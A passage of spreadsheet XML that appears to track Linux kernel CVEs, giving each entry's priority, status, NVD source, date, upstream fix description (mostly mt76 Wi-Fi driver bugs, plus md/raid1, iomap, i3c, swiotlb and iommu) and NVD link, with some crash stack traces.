      <c r="Q743" s="5" t="inlineStr"/>
      <c r="R743" s="5" t="inlineStr"/>
      <c r="S743" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix non-AQL packet accounting for MLO stations
__mt76_tx_queue_skb() overrides the wcid passed by the driver with
sta-&gt;drv_priv, so the wcid might incorrectly be changed after TX,
causing wcid-&gt;non_aql_packets to be counted on the wrong wcid. For
example, on the AP side, if a station's setup link is the 5G link and
the station uses 2G to transmit a frame, the value of non_aql_packets
is increased on the 5G wcid but decreased on the 2G wcid. Once the
inflated counter exceeds MT_MAX_NON_AQL_PKT, the TX scheduler
permanently refuses to service the station.
Drop the reassignment and account on the wcid used for transmission.
This also records the actual wcid in the queue entry.</t>
        </is>
      </c>
      <c r="T743" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90375</t>
        </is>
      </c>
    </row>
    <row r="744">
      <c r="A744" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B744" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C744" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90376</t>
        </is>
      </c>
      <c r="D744" s="5" t="inlineStr"/>
      <c r="E744" s="5" t="inlineStr"/>
      <c r="F744" s="5" t="inlineStr"/>
      <c r="G744" s="5" t="inlineStr"/>
      <c r="H744" s="5" t="inlineStr"/>
      <c r="I744" s="5" t="inlineStr"/>
      <c r="J744" s="5" t="inlineStr"/>
      <c r="K744" s="5" t="inlineStr"/>
      <c r="L744" s="5" t="inlineStr"/>
      <c r="M744" s="5" t="inlineStr"/>
      <c r="N744" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O744" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P744" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q744" s="5" t="inlineStr"/>
      <c r="R744" s="5" t="inlineStr"/>
      <c r="S744" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: fix MLD ID in MAC TXD and HIF TXP
Problem:
MCU command timeout while the firmware state is normal, and the
firmware keeps showing the error log "ERROR!! NO PAUSE...".
Root cause:
If the MLD_ID field in the TXD is neither the primary link id nor the
secondary link id, it may lead to a firmware busy loop when the third
link is in power saving mode.
Remap frames directed to a third link to the primary link wcid. Since
TX status events and txfree completions carry the wcid the firmware
saw, use the remapped wcid for packet id tracking and non-AQL packet
accounting as well, while the frame keeps its original link context
for addressing, band and OMAC selection.</t>
        </is>
      </c>
      <c r="T744" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90376</t>
        </is>
      </c>
    </row>
    <row r="745">
      <c r="A745" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B745" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C745" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90377</t>
        </is>
      </c>
      <c r="D745" s="5" t="inlineStr"/>
      <c r="E745" s="5" t="inlineStr"/>
      <c r="F745" s="5" t="inlineStr"/>
      <c r="G745" s="5" t="inlineStr"/>
      <c r="H745" s="5" t="inlineStr"/>
      <c r="I745" s="5" t="inlineStr"/>
      <c r="J745" s="5" t="inlineStr"/>
      <c r="K745" s="5" t="inlineStr"/>
      <c r="L745" s="5" t="inlineStr"/>
      <c r="M745" s="5" t="inlineStr"/>
      <c r="N745" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O745" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P745" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q745" s="5" t="inlineStr"/>
      <c r="R745" s="5" t="inlineStr"/>
      <c r="S745" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix RX data queuing of RRO 3.0
For RRO 3.0, RX data released from a RRO data queue should be put to
the indicator queue. The frames are processed and completed in the
context of the indicator queue NAPI, which only polls skbs queued on
the MT_RXQ_RRO_IND list; frames queued under the data queue id are
left sitting on that list until the data queue NAPI happens to run,
stalling and reordering RX data.</t>
        </is>
      </c>
      <c r="T745" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90377</t>
        </is>
      </c>
    </row>
    <row r="746">
      <c r="A746" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B746" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C746" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90378</t>
        </is>
      </c>
      <c r="D746" s="5" t="inlineStr"/>
      <c r="E746" s="5" t="inlineStr"/>
      <c r="F746" s="5" t="inlineStr"/>
      <c r="G746" s="5" t="inlineStr"/>
      <c r="H746" s="5" t="inlineStr"/>
      <c r="I746" s="5" t="inlineStr"/>
      <c r="J746" s="5" t="inlineStr"/>
      <c r="K746" s="5" t="inlineStr"/>
      <c r="L746" s="5" t="inlineStr"/>
      <c r="M746" s="5" t="inlineStr"/>
      <c r="N746" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O746" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P746" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q746" s="5" t="inlineStr"/>
      <c r="R746" s="5" t="inlineStr"/>
      <c r="S746" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt792x: Fix memory leak in SDIO TX path
When tx_prepare_skb() returns an error in the SDIO TX path, the
skb is not freed, leading to a memory leak. This can occur when
zero-length frames (such as WNM NULL frames) are dropped to prevent
potential hardware TX hangs.
Fix this by properly releasing the skb with ieee80211_tx_status_ext()
when tx_prepare_skb() fails.</t>
        </is>
      </c>
      <c r="T746" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90378</t>
        </is>
      </c>
    </row>
    <row r="747">
      <c r="A747" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B747" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C747" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90379</t>
        </is>
      </c>
      <c r="D747" s="5" t="inlineStr"/>
      <c r="E747" s="5" t="inlineStr"/>
      <c r="F747" s="5" t="inlineStr"/>
      <c r="G747" s="5" t="inlineStr"/>
      <c r="H747" s="5" t="inlineStr"/>
      <c r="I747" s="5" t="inlineStr"/>
      <c r="J747" s="5" t="inlineStr"/>
      <c r="K747" s="5" t="inlineStr"/>
      <c r="L747" s="5" t="inlineStr"/>
      <c r="M747" s="5" t="inlineStr"/>
      <c r="N747" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O747" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P747" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q747" s="5" t="inlineStr"/>
      <c r="R747" s="5" t="inlineStr"/>
      <c r="S747" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7921: Add PCIe AER handler support to prevent system crash
When an AER error occurs and the bus is hung, the register reads return
0xFFFFFFFF, causing the DMA queue state to be corrupted and resulting in
an invalid memory access when accessing q-&gt;desc[] or q-&gt;entry[].
Unable to handle kernel paging request at virtual address
ffffffc01099eac0
pc : mt76_dma_add_buf+0x124/0x188 [mt76]
lr : mt76_dma_rx_fill+0x11c/0x1d8 [mt76]
sp : ffffffc016d9bbf0
x29: ffffffc016d9bc10 x28: 0000000000000000
x27: 0000000000000000 x26: ffffffb7855e50b8
x25: ffffffb80d04f000 x24: 0000000000000000
x23: 0000000000000ec0 x22: ffffffb796803648
x21: ffffffb796801f80 x20: ffffffb7968035f8
x19: 0000000000000ec0 x18: 0000000000000000
x17: 000000004ec00000 x16: 000000000ec00000
x15: ffffffc01099eac0 x14: 000000004ec00000
x13: 00000000ffc5a000 x12: ffffffc016d9bc32
x11: 00000000ffffffff x10: 0000000000000002
x9 : 0000000000000000 x8 : 000000000000b4ac
x7 : 0000000000000a20 x6 : ffffffb6c1806400
x5 : 0000000000000000 x4 : ffffffb80d04f000
x3 : 0000000000000000 x2 : 0000000000000001
x1 : 000000000ec04000 x0 : ffffffb7968035f8
Call trace:
 mt76_dma_add_buf+0x124/0x188 [mt76 (HASH:1029 4)]
 mt76_dma_rx_reset+0xe8/0xfc [mt76 (HASH:1029 4)]
 mt7921_wpdma_reset+0x188/0x1b0 [mt7921e (HASH:ee48 5)]
 mt7921e_mac_reset+0x128/0x418 [mt7921e (HASH:ee48 5)]
 mt7921_mac_reset_work+0xac/0x1a8 [mt7921_common (HASH:f721 6)]
 process_one_work+0x188/0x514
 worker_thread+0x12c/0x300
 kthread+0x140/0x1fc
 ret_from_fork+0x10/0x30
Fix the invalid memory access by validating the DMA index read from the
hardware before it is used as a queue index. An out-of-range value, such
as the 0xFFFFFFFF returned while the bus is hung, is now clamped so it can
no longer corrupt q-&gt;head or q-&gt;tail. In addition, check the bus_hung flag
in mt7921_mac_reset_work() before attempting the reset sequence, reject MCU
messages while the bus is hung, and install no-op bus operations when an
unrecoverable AER error is detected, preventing further invalid hardware
accesses.
Due to hardware limitations - such as the lack of a connected hardware
reset pin or the absence of host re-probe functionality - affected Wi-Fi
devices may not fully recover to a normal operational state after
certain errors, even with AER enabled.</t>
        </is>
      </c>
      <c r="T747" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90379</t>
        </is>
      </c>
    </row>
    <row r="748">
      <c r="A748" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B748" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C748" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90380</t>
        </is>
      </c>
      <c r="D748" s="5" t="inlineStr"/>
      <c r="E748" s="5" t="inlineStr"/>
      <c r="F748" s="5" t="inlineStr"/>
      <c r="G748" s="5" t="inlineStr"/>
      <c r="H748" s="5" t="inlineStr"/>
      <c r="I748" s="5" t="inlineStr"/>
      <c r="J748" s="5" t="inlineStr"/>
      <c r="K748" s="5" t="inlineStr"/>
      <c r="L748" s="5" t="inlineStr"/>
      <c r="M748" s="5" t="inlineStr"/>
      <c r="N748" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O748" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P748" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q748" s="5" t="inlineStr"/>
      <c r="R748" s="5" t="inlineStr"/>
      <c r="S748" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt792x: fix use-after-free in mt76_rx_poll_complete
A use-after-free issue occurs in mt76_rx_poll_complete due to a race
condition. The STA has already been removed, but the rx_status still
had a pointer to the wcid in the STA.
Set the links' wcid pointers to be NULL for a MLD in
mt7925_sta_pre_rcu_remove()
BUG: KASAN: invalid-access in mt76_rx_poll_complete+0x280/0x470
Call trace:
dump_backtrace+0xec/0x128
show_stack+0x18/0x28
dump_stack_lvl+0x40/0xc8
print_report+0x1b8/0x710
kasan_report+0xe0/0x144
do_bad_area+0x120/0x260
do_tag_check_fault+0x20/0x34
do_mem_abort+0x54/0xa8
el1_abort+0x3c/0x5c
el1h_64_sync_handler+0x40/0xcc
el1h_64_sync+0x7c/0x80
mt76_rx_poll_complete+0x280/0x470
mt76_dma_rx_poll+0x114/0x51c
mt792x_poll_rx+0x60/0xf8
napi_threaded_poll_loop+0xe0/0x450
napi_threaded_poll+0x80/0x9c
kthread+0x11c/0x158
ret_from_fork+0x10/0x20</t>
        </is>
      </c>
      <c r="T748" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90380</t>
        </is>
      </c>
    </row>
    <row r="749">
      <c r="A749" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B749" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C749" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90381</t>
        </is>
      </c>
      <c r="D749" s="5" t="inlineStr"/>
      <c r="E749" s="5" t="inlineStr"/>
      <c r="F749" s="5" t="inlineStr"/>
      <c r="G749" s="5" t="inlineStr"/>
      <c r="H749" s="5" t="inlineStr"/>
      <c r="I749" s="5" t="inlineStr"/>
      <c r="J749" s="5" t="inlineStr"/>
      <c r="K749" s="5" t="inlineStr"/>
      <c r="L749" s="5" t="inlineStr"/>
      <c r="M749" s="5" t="inlineStr"/>
      <c r="N749" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O749" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P749" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q749" s="5" t="inlineStr"/>
      <c r="R749" s="5" t="inlineStr"/>
      <c r="S749" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: fix handling channel context with different bands in mt76_switch_vif_chanctx()
When performing channel switches on different radios within a short
timeframe, channel contexts with different bands can be carried for
each struct ieee80211_vif_chanctx_switch.
Rework mt76_switch_vif_chanctx() to properly handle this scenario.</t>
        </is>
      </c>
      <c r="T749" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90381</t>
        </is>
      </c>
    </row>
    <row r="750">
      <c r="A750" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B750" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C750" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90382</t>
        </is>
      </c>
      <c r="D750" s="5" t="inlineStr"/>
      <c r="E750" s="5" t="inlineStr"/>
      <c r="F750" s="5" t="inlineStr"/>
      <c r="G750" s="5" t="inlineStr"/>
      <c r="H750" s="5" t="inlineStr"/>
      <c r="I750" s="5" t="inlineStr"/>
      <c r="J750" s="5" t="inlineStr"/>
      <c r="K750" s="5" t="inlineStr"/>
      <c r="L750" s="5" t="inlineStr"/>
      <c r="M750" s="5" t="inlineStr"/>
      <c r="N750" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O750" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P750" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q750" s="5" t="inlineStr"/>
      <c r="R750" s="5" t="inlineStr"/>
      <c r="S750" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt76x02: do not WARN on invalid rx descriptor length
The MPDU length in the rx descriptor comes from the hardware. In
monitor mode with the fcsfail filter enabled, the hardware passes up
corrupted frames, and a corrupted frame can report a length larger
than the received buffer. The bounds check correctly discards such
frames, but its WARN_ON_ONCE wrapper means any over-the-air garbage
frame taints the kernel, and panics it on the first such frame when
panic_on_warn is set.
Drop the WARN and discard the frame silently, matching what
commit c2d4c8723dbf ("mt76x2: remove some harmless WARN_ONs in tx
status and rx path") did for the neighboring rx and tx status paths.
Observed immediately on rx with an MT7612U in fcsfail monitor mode
on a busy channel.</t>
        </is>
      </c>
      <c r="T750" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90382</t>
        </is>
      </c>
    </row>
    <row r="751">
      <c r="A751" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B751" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C751" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90383</t>
        </is>
      </c>
      <c r="D751" s="5" t="inlineStr"/>
      <c r="E751" s="5" t="inlineStr"/>
      <c r="F751" s="5" t="inlineStr"/>
      <c r="G751" s="5" t="inlineStr"/>
      <c r="H751" s="5" t="inlineStr"/>
      <c r="I751" s="5" t="inlineStr"/>
      <c r="J751" s="5" t="inlineStr"/>
      <c r="K751" s="5" t="inlineStr"/>
      <c r="L751" s="5" t="inlineStr"/>
      <c r="M751" s="5" t="inlineStr"/>
      <c r="N751" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O751" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P751" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q751" s="5" t="inlineStr"/>
      <c r="R751" s="5" t="inlineStr"/>
      <c r="S751" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
misc: sgi-gru: remove interrupt-context page-table walks
The GRU TLB miss handler walks a process's page tables without holding
page-table locks or a reference to the mapped page. It also uses a kernel
page-table accessor on user page tables and supports only PMD-level large
mappings on x86-64.
Remove the direct walker. Send interrupt faults directly to user polling
mode so the existing call-OS fallback retries them in process context.
Remove the mmap-lock failure statistic that can no longer be incremented.</t>
        </is>
      </c>
      <c r="T751" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90383</t>
        </is>
      </c>
    </row>
    <row r="752">
      <c r="A752" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B752" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C752" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90384</t>
        </is>
      </c>
      <c r="D752" s="5" t="inlineStr"/>
      <c r="E752" s="5" t="inlineStr"/>
      <c r="F752" s="5" t="inlineStr"/>
      <c r="G752" s="5" t="inlineStr"/>
      <c r="H752" s="5" t="inlineStr"/>
      <c r="I752" s="5" t="inlineStr"/>
      <c r="J752" s="5" t="inlineStr"/>
      <c r="K752" s="5" t="inlineStr"/>
      <c r="L752" s="5" t="inlineStr"/>
      <c r="M752" s="5" t="inlineStr"/>
      <c r="N752" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O752" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P752" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q752" s="5" t="inlineStr"/>
      <c r="R752" s="5" t="inlineStr"/>
      <c r="S752" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iomap: release the folio batch on iomap callback failures
A sashiko review of an unrelated patch points out that the folio
batch mechanism used for iomap zero range fails to release the batch
in a couple error scenarios. If either calls to -&gt;iomap_end() or
-&gt;iomap_begin() fail, the direct return paths bypass the batch
cleanup.
The -&gt;iomap_end() case is not a practical issue at the moment
because there is no user of the mechanism that returns an error from
this path. The -&gt;iomap_begin() case is theoretically possible
because XFS can invoke the fill helper and error out at various
points thereafter. This subtly complicates things because XFS does
not transfer iomap_flags to the iomap data structure in the error
path.
To deal with both of these issues, first make sure to invoke the
cleanup helper in the error path for either fs callback. Second,
update the helper to clear the flag unconditionally and release the
batch so long as it is populated. This more clearly delineates the
purpose of the flag to control the I/O path and not necessarily the
status of the fbatch, so add a comment around this as well.</t>
        </is>
      </c>
      <c r="T752" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90384</t>
        </is>
      </c>
    </row>
    <row r="753">
      <c r="A753" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B753" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C753" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90385</t>
        </is>
      </c>
      <c r="D753" s="5" t="inlineStr"/>
      <c r="E753" s="5" t="inlineStr"/>
      <c r="F753" s="5" t="inlineStr"/>
      <c r="G753" s="5" t="inlineStr"/>
      <c r="H753" s="5" t="inlineStr"/>
      <c r="I753" s="5" t="inlineStr"/>
      <c r="J753" s="5" t="inlineStr"/>
      <c r="K753" s="5" t="inlineStr"/>
      <c r="L753" s="5" t="inlineStr"/>
      <c r="M753" s="5" t="inlineStr"/>
      <c r="N753" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O753" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P753" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q753" s="5" t="inlineStr"/>
      <c r="R753" s="5" t="inlineStr"/>
      <c r="S753" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid1: create serial pool adding rdev to array with serialize_policy=1
The following bug has been observed with kernel 7.1.3 after adding a new
rdev to an existing RAID1 array with serialize_policy enabled:
  Oops: 0002 [#1]
  CPU: 0 UID: 0 PID: 19639 Comm: ext4lazyinit Not tainted 7.1.3-1-default
  RIP: _raw_spin_lock_irqsave+0x27/0x50
  CR2: 0000000000004960
  Call Trace:
   wait_for_serialization+0xb9/0x260 [raid1]
   raid1_make_request+0x762/0xaff [raid1]
   md_handle_request+0x1c9/0x2e0 [md_mod]
The raid1.c code calls wait_for_serialization() if the MD_SERIALIZE_POLICY
is set, and wait_for_serialization assumes that rdev-&gt;serial is
initialized. Normally this will be the case for arrays that have
the serialize_policy sysfs attribute set to 1.
But when a new rdev is added to an existing array in bind_rdev_to_array(),
the condition at mddev_create_serial_pool() causes creation of rdev-&gt;serial
to be skipped. Fix it.</t>
        </is>
      </c>
      <c r="T753" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90385</t>
        </is>
      </c>
    </row>
    <row r="754">
      <c r="A754" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B754" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C754" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90386</t>
        </is>
      </c>
      <c r="D754" s="5" t="inlineStr"/>
      <c r="E754" s="5" t="inlineStr"/>
      <c r="F754" s="5" t="inlineStr"/>
      <c r="G754" s="5" t="inlineStr"/>
      <c r="H754" s="5" t="inlineStr"/>
      <c r="I754" s="5" t="inlineStr"/>
      <c r="J754" s="5" t="inlineStr"/>
      <c r="K754" s="5" t="inlineStr"/>
      <c r="L754" s="5" t="inlineStr"/>
      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr"/>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: dw: avoid shift-out-of-bounds when DAA assigns no devices
On an empty bus ENTDAA assigns nothing, so cmd-&gt;rx_len (the count
of addresses left unassigned) equals master-&gt;maxdevs.
The GENMASK() index master-&gt;maxdevs - cmd-&gt;rx_len - 1 then becomes -1,
which trips up UBSAN. This happens every time on boot on a Gigabyte/AMD
server:
    UBSAN: shift-out-of-bounds in drivers/i3c/master/dw-i3c-master.c:905:12
    shift exponent 64 is too large for 64-bit type 'long unsigned int'
    CPU: 7 UID: 0 PID: 963 Comm: (udev-worker) Not tainted 7.0.11-200.fc44.x86_64 #1 PREEMPT(lazy)
    Hardware name: Giga Computing E163-Z34-AAH1-000/MZ33-DC1-000, BIOS R32_F45 04/01/2026
    Call Trace:
     &lt;TASK&gt;
     dump_stack_lvl+0x5d/0x80
     ubsan_epilogue+0x5/0x2b
     __ubsan_handle_shift_out_of_bounds.cold+0xd7/0x1ab
     dw_i3c_master_daa.cold+0x1b/0x96 [dw_i3c_master]
     i3c_master_do_daa_ext.part.0+0x3e/0xf0 [i3c]
Skip the mask when no new device was assigned.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90386</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90387</t>
        </is>
      </c>
      <c r="D755" s="5" t="inlineStr"/>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="inlineStr"/>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr"/>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr"/>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
swiotlb: Preserve allocation virtual address for dynamic pools
swiotlb_alloc_tlb() can allocate from the DMA atomic pool when a decrypted
pool is needed from atomic context. With CONFIG_DMA_DIRECT_REMAP, the
atomic pool is backed by remapped virtual addresses, which are not the same
as the direct-map addresses returned by phys_to_virt().
swiotlb_init_io_tlb_pool() currently reconstructs the pool virtual address
from the physical start address. For atomic-pool backed allocations this
stores the wrong address in pool-&gt;vaddr. Later, swiotlb_free_tlb() passes
that address to dma_free_from_pool(), which will fail to recognize the
chunk
Pass the virtual address returned by the allocation path into
swiotlb_init_io_tlb_pool(), and store that address in pool-&gt;vaddr. This
keeps the pool free path using the same virtual address as the allocator.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90387</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90388</t>
        </is>
      </c>
      <c r="D756" s="5" t="inlineStr"/>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="inlineStr"/>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr"/>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr"/>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/dma: Check atomic pool allocation result directly
The non-blocking, non-coherent allocation path uses dma_alloc_from_pool(),
which returns the allocated page and fills cpu_addr only on success.
Do not rely on cpu_addr to detect allocation failure in this path. Check
the returned page directly before using it for the IOMMU mapping.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90388</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90389</t>
        </is>
      </c>
      <c r="D757" s="5" t="inlineStr"/>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="inlineStr"/>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="inlineStr"/>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr"/>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
